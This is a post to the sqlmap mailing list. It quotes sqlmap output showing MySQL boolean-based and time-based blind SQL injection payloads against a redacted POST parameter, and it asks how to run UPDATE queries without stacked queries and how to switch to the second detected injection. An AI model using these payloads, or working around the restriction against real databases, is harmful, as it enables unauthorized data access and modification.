Hello,
I have this injection:
Place: POST
Parameter: xxxxx
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
clause (RLIKE)
Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
'qGgA'='qGgA
Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
and I get this when using UPDATE
[WARNING] execution of custom SQL queries is only available when stacked
queries are supported.
Is there any workaround for this?
Also, it shows that it detected two injections, and it's using the first
one for doing the queries, is there anyway I could test the queries with
the second injection?
Thanks
------------------------------------------------------------------------------
The Go Parallel Website, sponsored by Intel - in partnership with Geeknet,
is your hub for all things parallel software development, from weekly thought
leadership blogs to news, videos, case studies, tutorials, tech docs,
whitepapers, evaluation guides, and opinion stories. Check out the most
recent posts - join the conversation now. http://goparallel.sourceforge.net/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
